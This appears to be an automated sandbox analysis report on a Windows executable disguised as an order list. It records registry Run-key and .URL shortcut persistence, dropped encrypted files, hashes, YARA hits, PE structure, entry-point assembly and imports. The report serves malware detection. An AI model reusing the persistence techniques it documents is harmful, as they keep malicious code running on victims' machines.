                                                                                              19:02:42AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Tdfgwnfyyv C:\Users\user\Contacts\vyyfnwgfdT.url
                                                                                              19:02:44API Interceptor2x Sleep call for process: Tdfgwnfyyv.exe modified
                                                                                              19:06:06AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run AHLTIJ3XPTFX C:\Program Files (x86)\Fg00t0t5x\6ld01n28q8c.exe
                                                                                              19:06:14AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run AHLTIJ3XPTFX C:\Program Files (x86)\Fg00t0t5x\6ld01n28q8c.exe
                                                                                              No context
                                                                                              No context
                                                                                              No context
                                                                                              No context
                                                                                              No context
                                                                                              Process:C:\Users\user\Desktop\Noua lista de comenzi.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):514560
                                                                                              Entropy (8bit):7.996940465977845
                                                                                              Encrypted:true
                                                                                              SSDEEP:12288:4O70s0bprmd7hBbKYR+TegyIieXpcA/baXOo6Th:Dr0oBbrR+nyIhZcV16Th
                                                                                              MD5:F493F19D3321C61C6A854FAF08B9664E
                                                                                              SHA1:2E763D8B445B4DB8A4BE1F31D8531B4D1CF650A2
                                                                                              SHA-256:BF83A737EC27EBDB99099E4A56CD4F11BF8CEEFA2C2C2C8C0737BB572C477FC7
                                                                                              SHA-512:EE1294DC27DA9D0335A823290583457B6813A5D3567849A0136B6740EF1C23FBE26C0266F600D29F842706547BEAE114BE820067CA59EA2EF57E0EC85D8A2672
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview:..J.R.. i'.......{.Uw..=...s..N....<7.o!..+...l.......s......{.)..)..........$vB......`.%.,.-.w.........`..s........X....Qk g j.H....q:1...T...Z...n...B.8%.}.AZ..V..q.........+.f....V..q..._.a...Uq0.l.l.....w.$y.......u.!......_.K].F....d.#....f....4/..WzEJ.i-..AZ.a.g o).d..5.Si1.?..{....vOg49..~V.'....8/...EJ.i-..^...~^..j.].'.n.....=..7.....f.J...42..k^...L.J........h..;.>K,.X..v_.1......z0}...0..J....L..ti;.a.*.}....B....I2vo.@.P.+.5.T..R....[.Sd.1.........b.H......C[#.'...l......'.8[u.:.....)..n.rP...5.......+...,.......1....?..5.~.F:.<......3Gfs.T&`.>...X..G.\.(#.l.......Sb.IH...w.AWm.Qw...y.OaS_.......,.\8.l.. ..I._^=.i....S._..Y^(........~..#..|q.GIE\.S.kpE..U...p[N..v...{.(..&..e^./...K.......{.(.....o..F&SW.-.......2;....*9.N..z.....j...5..z}.>g:..c..MO...@..1.aD.H.5..c[$SU.xw.J......f....0.H u.9..%..v.8;..AQD...,.........A]..{.0..T.k..e......z|E`.%.m @.|IGvj...j...........V.`..P......_:.MB.`....L..:"X..5.(+..+..Kv[#.\..}..o$e>.5..
                                                                                              Process:C:\Users\user\Contacts\Tdfgwnfyyv.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):514560
                                                                                              Entropy (8bit):7.996940465977845
                                                                                              Encrypted:true
                                                                                              SSDEEP:12288:4O70s0bprmd7hBbKYR+TegyIieXpcA/baXOo6Th:Dr0oBbrR+nyIhZcV16Th
                                                                                              MD5:F493F19D3321C61C6A854FAF08B9664E
                                                                                              SHA1:2E763D8B445B4DB8A4BE1F31D8531B4D1CF650A2
                                                                                              SHA-256:BF83A737EC27EBDB99099E4A56CD4F11BF8CEEFA2C2C2C8C0737BB572C477FC7
                                                                                              SHA-512:EE1294DC27DA9D0335A823290583457B6813A5D3567849A0136B6740EF1C23FBE26C0266F600D29F842706547BEAE114BE820067CA59EA2EF57E0EC85D8A2672
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview:..J.R.. i'.......{.Uw..=...s..N....<7.o!..+...l.......s......{.)..)..........$vB......`.%.,.-.w.........`..s........X....Qk g j.H....q:1...T...Z...n...B.8%.}.AZ..V..q.........+.f....V..q..._.a...Uq0.l.l.....w.$y.......u.!......_.K].F....d.#....f....4/..WzEJ.i-..AZ.a.g o).d..5.Si1.?..{....vOg49..~V.'....8/...EJ.i-..^...~^..j.].'.n.....=..7.....f.J...42..k^...L.J........h..;.>K,.X..v_.1......z0}...0..J....L..ti;.a.*.}....B....I2vo.@.P.+.5.T..R....[.Sd.1.........b.H......C[#.'...l......'.8[u.:.....)..n.rP...5.......+...,.......1....?..5.~.F:.<......3Gfs.T&`.>...X..G.\.(#.l.......Sb.IH...w.AWm.Qw...y.OaS_.......,.\8.l.. ..I._^=.i....S._..Y^(........~..#..|q.GIE\.S.kpE..U...p[N..v...{.(..&..e^./...K.......{.(.....o..F&SW.-.......2;....*9.N..z.....j...5..z}.>g:..c..MO...@..1.aD.H.5..c[$SU.xw.J......f....0.H u.9..%..v.8;..AQD...,.........A]..{.0..T.k..e......z|E`.%.m @.|IGvj...j...........V.`..P......_:.MB.`....L..:"X..5.(+..+..Kv[#.\..}..o$e>.5..
                                                                                              Process:C:\Users\user\Contacts\Tdfgwnfyyv.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):514560
                                                                                              Entropy (8bit):7.996940465977845
                                                                                              Encrypted:true
                                                                                              SSDEEP:12288:4O70s0bprmd7hBbKYR+TegyIieXpcA/baXOo6Th:Dr0oBbrR+nyIhZcV16Th
                                                                                              MD5:F493F19D3321C61C6A854FAF08B9664E
                                                                                              SHA1:2E763D8B445B4DB8A4BE1F31D8531B4D1CF650A2
                                                                                              SHA-256:BF83A737EC27EBDB99099E4A56CD4F11BF8CEEFA2C2C2C8C0737BB572C477FC7
                                                                                              SHA-512:EE1294DC27DA9D0335A823290583457B6813A5D3567849A0136B6740EF1C23FBE26C0266F600D29F842706547BEAE114BE820067CA59EA2EF57E0EC85D8A2672
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview:..J.R.. i'.......{.Uw..=...s..N....<7.o!..+...l.......s......{.)..)..........$vB......`.%.,.-.w.........`..s........X....Qk g j.H....q:1...T...Z...n...B.8%.}.AZ..V..q.........+.f....V..q..._.a...Uq0.l.l.....w.$y.......u.!......_.K].F....d.#....f....4/..WzEJ.i-..AZ.a.g o).d..5.Si1.?..{....vOg49..~V.'....8/...EJ.i-..^...~^..j.].'.n.....=..7.....f.J...42..k^...L.J........h..;.>K,.X..v_.1......z0}...0..J....L..ti;.a.*.}....B....I2vo.@.P.+.5.T..R....[.Sd.1.........b.H......C[#.'...l......'.8[u.:.....)..n.rP...5.......+...,.......1....?..5.~.F:.<......3Gfs.T&`.>...X..G.\.(#.l.......Sb.IH...w.AWm.Qw...y.OaS_.......,.\8.l.. ..I._^=.i....S._..Y^(........~..#..|q.GIE\.S.kpE..U...p[N..v...{.(..&..e^./...K.......{.(.....o..F&SW.-.......2;....*9.N..z.....j...5..z}.>g:..c..MO...@..1.aD.H.5..c[$SU.xw.J......f....0.H u.9..%..v.8;..AQD...,.........A]..{.0..T.k..e......z|E`.%.m @.|IGvj...j...........V.`..P......_:.MB.`....L..:"X..5.(+..+..Kv[#.\..}..o$e>.5..
                                                                                              Process:C:\Windows\explorer.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):77312
                                                                                              Entropy (8bit):7.16861421226381
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:GbZI91OwxgwYfPSqlGv+BNXNvuZS36EDtAZ7jz6dTdMQiMtYwJj/:KOOwNMSqoKXNvuZAFDqXzlzQb
                                                                                              MD5:302B1BBDBF4D96BEE99C6B45680CEB5E
                                                                                              SHA1:FAFC3F636DEFD86A2CE8ACFF0A1A9213E48F9161
                                                                                              SHA-256:3027DF855CD3207C99DBD2DC1D4534F728046202C16277C24C39855632089E76
                                                                                              SHA-512:DAB68ECE96269586DF9FE745687EA5A9688F390AF0AE886F8EEE4AABFA91B205653D5027BDDDB210DC87E282DB30AB61500F9C29F1166AB8E2A056C3ED120198
                                                                                              Malicious:false
                                                                                              Antivirus:
                                                                                              • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                              Reputation:unknown
                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......I..X...........0....b......b......b......b.........(..b......b.\....b......Rich...................PE..L........................................... ....@..........................p...........@...... ...........................0.......@.......................`..L...@...T............................................0...............................text............................... ..`.data...p.... ......................@....idata.......0......................@..@.rsrc........@......................@..@.reloc..L....`.......,..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Windows\explorer.exe
                                                                                              File Type:Composite Document File V2 Document, Cannot read section info
                                                                                              Category:dropped
                                                                                              Size (bytes):7168
                                                                                              Entropy (8bit):4.352653867313707
                                                                                              Encrypted:false
                                                                                              SSDEEP:96:D6U3xM3O5q0MXbLFbSpHW9ZdRh/1bSdAi3bLih:D9BUOg0A3d/r
                                                                                              MD5:C1A7E4AE688EE3B07960CDAA7EB019A2
                                                                                              SHA1:1A4AA39EBB3AF20D6508117D17E31CB7795DCA1C
                                                                                              SHA-256:53010FBA63490BF781FB657F1C72E087C0BBADEDAEF76D91295699A7477E86C4
                                                                                              SHA-512:AD2F34DEE8CAF674D11AFA6C303196B812306AD87E206D97DD0E7AA080C70F7770E018EE92E8B153A7D6DD9B527DB64C5B7EC24273E0FF05901799572BA8F58C
                                                                                              Malicious:false
                                                                                              Reputation:unknown
                                                                                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Users\user\Desktop\Noua lista de comenzi.exe
                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):755200
                                                                                              Entropy (8bit):7.00614765549721
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:0HZspw3ZruZb100eubQXXEcIi0FyoADygqwdmLjnEiCHcFaLcpXAAAAAAAAAAAA3:MZAws11Q7XU0G/Tgq4KjRd
                                                                                              MD5:C6C9905431F32998369BA3FCE5743A2B
                                                                                              SHA1:7523DC8923179973879C227AD1776FF583660E3D
                                                                                              SHA-256:527036F9E449DE86DC23CA03F80EA7DA2D0EE7D7752203BBFAD4FFB9237A19A8
                                                                                              SHA-512:F2C49952055DC82CB91777AC1F68C4C8FAB85D4824502A6F357E0942D30C9E67C309D86FD320BF8CA968814794016950663E3F93431E0CC524BF910FA4869685
                                                                                              Malicious:true
                                                                                              Antivirus:
                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                              Reputation:unknown
                                                                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..............................................@..............................Z$.......&...................@...|...........................0......................................................CODE................................ ..`DATA................................@...BSS.....y................................idata..Z$.......&..................@....tls......... ...........................rdata.......0......................@..P.reloc...|...@...~..................@..P.rsrc....&.......&...`..............@..P....................................@..P........................................................................................................................................
                                                                                              Process:C:\Users\user\Desktop\Noua lista de comenzi.exe
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):26
                                                                                              Entropy (8bit):3.95006375643621
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                              Malicious:true
                                                                                              Reputation:unknown
                                                                                              Preview:[ZoneTransfer]....ZoneId=0
                                                                                              Process:C:\Users\user\Desktop\Noua lista de comenzi.exe
                                                                                              File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\user\\Contacts\\Tdfgwnfyyv.exe">), ASCII text, with CRLF line terminators
                                                                                              Category:modified
                                                                                              Size (bytes):99
                                                                                              Entropy (8bit):4.988493266808153
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:HRAbABGQYmTWAX+T+Bf5rioSLDtT0dbsGKd8oXA7ovn:HRYFVmTWD0pH4DtMsb5Qsv
                                                                                              MD5:8DD0F01A93E0566D4B754F5D2C431564
                                                                                              SHA1:E11288CD36BABD958BF212B4E27B9DE606AE0D88
                                                                                              SHA-256:85ED84D7CC7B752E8B913B6C9983996E6B781AA0ED98D31459479B9635A1E3D6
                                                                                              SHA-512:F479E222ED987DF2ADFA7CA20A98A207E2C85FE01F598062362E08948F924CFF6EF72A868356CF71C05DAED05DD60F2D18F86D7CFC38BC8696E518E74F0A1BD5
                                                                                              Malicious:false
                                                                                              Yara Hits:
                                                                                              • Rule: Methodology_Shortcut_HotKey, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\user\Contacts\vyyfnwgfdT.url, Author: @itsreallynick (Nick Carr)
                                                                                              • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\user\Contacts\vyyfnwgfdT.url, Author: @itsreallynick (Nick Carr)
                                                                                              Reputation:unknown
                                                                                              Preview:[InternetShortcut]..URL=file:"C:\\Users\\user\\Contacts\\Tdfgwnfyyv.exe"..IconIndex=4..HotKey=82..
                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Entropy (8bit):7.00614765549721
                                                                                              TrID:
                                                                                              • Win32 Executable (generic) a (10002005/4) 90.87%
                                                                                              • Win32 Executable Borland Delphi 7 (665061/41) 6.04%
                                                                                              • Win32 Executable Borland Delphi 6 (262906/60) 2.39%
                                                                                              • InstallShield setup (43055/19) 0.39%
                                                                                              • Win32 Executable Delphi generic (14689/80) 0.13%
                                                                                              File name:Noua lista de comenzi.exe
                                                                                              File size:755200
                                                                                              MD5:c6c9905431f32998369ba3fce5743a2b
                                                                                              SHA1:7523dc8923179973879c227ad1776ff583660e3d
                                                                                              SHA256:527036f9e449de86dc23ca03f80ea7da2d0ee7d7752203bbfad4ffb9237a19a8
                                                                                              SHA512:f2c49952055dc82cb91777ac1f68c4c8fab85d4824502a6f357e0942d30c9e67c309d86fd320bf8ca968814794016950663e3f93431e0cc524bf910fa4869685
                                                                                              SSDEEP:12288:0HZspw3ZruZb100eubQXXEcIi0FyoADygqwdmLjnEiCHcFaLcpXAAAAAAAAAAAA3:MZAws11Q7XU0G/Tgq4KjRd
                                                                                              File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                              Icon Hash:489998145269a410
                                                                                              Entrypoint:0x46b100
                                                                                              Entrypoint Section:CODE
                                                                                              Digitally signed:false
                                                                                              Imagebase:0x400000
                                                                                              Subsystem:windows gui
                                                                                              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
                                                                                              DLL Characteristics:
                                                                                              Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                                              TLS Callbacks:
                                                                                              CLR (.Net) Version:
                                                                                              OS Version Major:4
                                                                                              OS Version Minor:0
                                                                                              File Version Major:4
                                                                                              File Version Minor:0
                                                                                              Subsystem Version Major:4
                                                                                              Subsystem Version Minor:0
                                                                                              Import Hash:c619ea405247cf4221d817e5b12ed8a6
                                                                                              Instruction
                                                                                              push ebp
                                                                                              mov ebp, esp
                                                                                              add esp, FFFFFFF0h
                                                                                              mov eax, 0046AE78h
                                                                                              call 00007FD8D8DBC355h
                                                                                              mov eax, dword ptr [0046D228h]
                                                                                              mov eax, dword ptr [eax]
                                                                                              call 00007FD8D8E102FDh
                                                                                              mov eax, dword ptr [0046D228h]
                                                                                              mov eax, dword ptr [eax]
                                                                                              mov edx, 0046B178h
                                                                                              call 00007FD8D8E0FED4h
                                                                                              mov ecx, dword ptr [0046D00Ch]
                                                                                              mov eax, dword ptr [0046D228h]
                                                                                              mov eax, dword ptr [eax]
                                                                                              mov edx, dword ptr [00469E74h]
                                                                                              call 00007FD8D8E102ECh
                                                                                              mov ecx, dword ptr [0046D244h]
                                                                                              mov eax, dword ptr [0046D228h]
                                                                                              mov eax, dword ptr [eax]
                                                                                              mov edx, dword ptr [0045F4F4h]
                                                                                              call 00007FD8D8E102D4h
                                                                                              mov eax, dword ptr [0046D228h]
                                                                                              mov eax, dword ptr [eax]
                                                                                              call 00007FD8D8E10348h
                                                                                              call 00007FD8D8DB9F87h
                                                                                              add byte ptr [eax], al
                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x6f0000x245a.idata
                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x7c0000x42600.rsrc
                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x740000x7c9c.reloc
                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x730000x18.rdata
                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                              CODE0x10000x6a1840x6a200False0.517368779446data6.52141598847IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                              DATA0x6c0000x13c80x1400False0.4458984375data4.17742129745IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                              BSS0x6e0000xd790x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                              .idata0x6f0000x245a0x2600False0.353412828947data4.92014889215IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                              .tls0x720000x100x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                              .rdata0x730000x180x200False0.05078125data0.203013767787IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                              .reloc0x740000x7c9c0x7e00False0.602833581349data6.67533219029IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                              .rsrc0x7c0000x426000x42600False0.43125073564data6.98536653819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                                              NameRVASizeTypeLanguageCountry
                                                                                              DE_KMSIZ0x7d38c0x2c683RIFF (little-endian) data, WAVE audio, Microsoft PCM, 8 bit, mono 11025 HzEnglishUnited States
                                                                                              RT_CURSOR0xa9a100x134data
                                                                                              RT_CURSOR0xa9b440x134data
                                                                                              RT_CURSOR0xa9c780x134data
                                                                                              RT_CURSOR0xa9dac0x134data
                                                                                              RT_CURSOR0xa9ee00x134data
                                                                                              RT_CURSOR0xaa0140x134data
                                                                                              RT_CURSOR0xaa1480x134data
                                                                                              RT_BITMAP0xaa27c0x1d0data
                                                                                              RT_BITMAP0xaa44c0x1e4data
                                                                                              RT_BITMAP0xaa6300x1d0data
                                                                                              RT_BITMAP0xaa8000x1d0data
                                                                                              RT_BITMAP0xaa9d00x1d0data
                                                                                              RT_BITMAP0xaaba00x1d0data
                                                                                              RT_BITMAP0xaad700x1d0data
                                                                                              RT_BITMAP0xaaf400x1d0data
                                                                                              RT_BITMAP0xab1100x1d0data
                                                                                              RT_BITMAP0xab2e00x1d0data
                                                                                              RT_BITMAP0xab4b00x128data
                                                                                              RT_BITMAP0xab5d80x128data
                                                                                              RT_BITMAP0xab7000x128data
                                                                                              RT_BITMAP0xab8280xe8data
                                                                                              RT_BITMAP0xab9100x128data
                                                                                              RT_BITMAP0xaba380x128data
                                                                                              RT_BITMAP0xabb600xd0data
                                                                                              RT_BITMAP0xabc300x128data
                                                                                              RT_BITMAP0xabd580x128data
                                                                                              RT_BITMAP0xabe800x128data
                                                                                              RT_BITMAP0xabfa80x128data
                                                                                              RT_BITMAP0xac0d00x128data
                                                                                              RT_BITMAP0xac1f80xe8data
                                                                                              RT_BITMAP0xac2e00x128data
                                                                                              RT_BITMAP0xac4080x128data
                                                                                              RT_BITMAP0xac5300xd0data
                                                                                              RT_BITMAP0xac6000x128data
                                                                                              RT_BITMAP0xac7280x128data
                                                                                              RT_BITMAP0xac8500x128data
                                                                                              RT_BITMAP0xac9780x128data
                                                                                              RT_BITMAP0xacaa00x128data
                                                                                              RT_BITMAP0xacbc80xe8data
                                                                                              RT_BITMAP0xaccb00x128data
                                                                                              RT_BITMAP0xacdd80x128data
                                                                                              RT_BITMAP0xacf000xd0data
                                                                                              RT_BITMAP0xacfd00x128data
                                                                                              RT_BITMAP0xad0f80x128data
                                                                                              RT_BITMAP0xad2200xe8GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                              RT_ICON0xad3080x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                              RT_ICON0xad7700x988dataEnglishUnited States
                                                                                              RT_ICON0xae0f80x10a8dataEnglishUnited States
                                                                                              RT_ICON0xaf1a00x25a8dataEnglishUnited States
                                                                                              RT_ICON0xb17480x94a8dataEnglishUnited States
                                                                                              RT_DIALOG0xbabf00x52data
                                                                                              RT_STRING0xbac440x378data
                                                                                              RT_STRING0xbafbc0x1ccdata
                                                                                              RT_STRING0xbb1880x188data
                                                                                              RT_STRING0xbb3100x1b0data
                                                                                              RT_STRING0xbb4c00x304data
                                                                                              RT_STRING0xbb7c40xdcdata
                                                                                              RT_STRING0xbb8a00x130data
                                                                                              RT_STRING0xbb9d00x268data
                                                                                              RT_STRING0xbbc380x41cdata
                                                                                              RT_STRING0xbc0540x370data
                                                                                              RT_STRING0xbc3c40x3e4data
                                                                                              RT_STRING0xbc7a80x234data
                                                                                              RT_STRING0xbc9dc0xecdata
                                                                                              RT_STRING0xbcac80x1b4data
                                                                                              RT_STRING0xbcc7c0x3e4data
                                                                                              RT_STRING0xbd0600x358data
                                                                                              RT_STRING0xbd3b80x2b4data
                                                                                              RT_RCDATA0xbd66c0x10data
                                                                                              RT_RCDATA0xbd67c0x368data
                                                                                              RT_RCDATA0xbd9e40x689Delphi compiled form 'T__1731424838'
                                                                                              RT_GROUP_CURSOR0xbe0700x14Lotus unknown worksheet or configuration, revision 0x1
                                                                                              RT_GROUP_CURSOR0xbe0840x14Lotus unknown worksheet or configuration, revision 0x1
                                                                                              RT_GROUP_CURSOR0xbe0980x14Lotus unknown worksheet or configuration, revision 0x1
                                                                                              RT_GROUP_CURSOR0xbe0ac0x14Lotus unknown worksheet or configuration, revision 0x1
                                                                                              RT_GROUP_CURSOR0xbe0c00x14Lotus unknown worksheet or configuration, revision 0x1
                                                                                              RT_GROUP_CURSOR0xbe0d40x14Lotus unknown worksheet or configuration, revision 0x1
                                                                                              RT_GROUP_CURSOR0xbe0e80x14Lotus unknown worksheet or configuration, revision 0x1
                                                                                              RT_GROUP_ICON0xbe0fc0x4cdataEnglishUnited States
                                                                                              RT_VERSION0xbe1480x360dataFrenchFrance
                                                                                              DLLImport
                                                                                              kernel32.dllDeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryA, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetFileType, CreateFileA, CloseHandle
                                                                                              user32.dllGetKeyboardType, LoadStringA, MessageBoxA, CharNextA
                                                                                              advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                                              oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                              kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                                              advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                                              kernel32.dlllstrcpyA, lstrcmpiA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualAlloc, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryW, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalSize, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetUserDefaultLCID, GetTickCount, GetThreadLocale, GetSystemInfo, GetStringTypeExA, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, GetACP, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CreateDirectoryA, CompareStringA, CloseHandle, AddAtomW
                                                                                              version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                                                              gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SelectClipRgn, SaveDC, RestoreDC, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetMapMode, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileDescriptionA, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBkMode, GetBitmapBits, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateEnhMetaFileA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, CloseEnhMetaFile, BitBlt
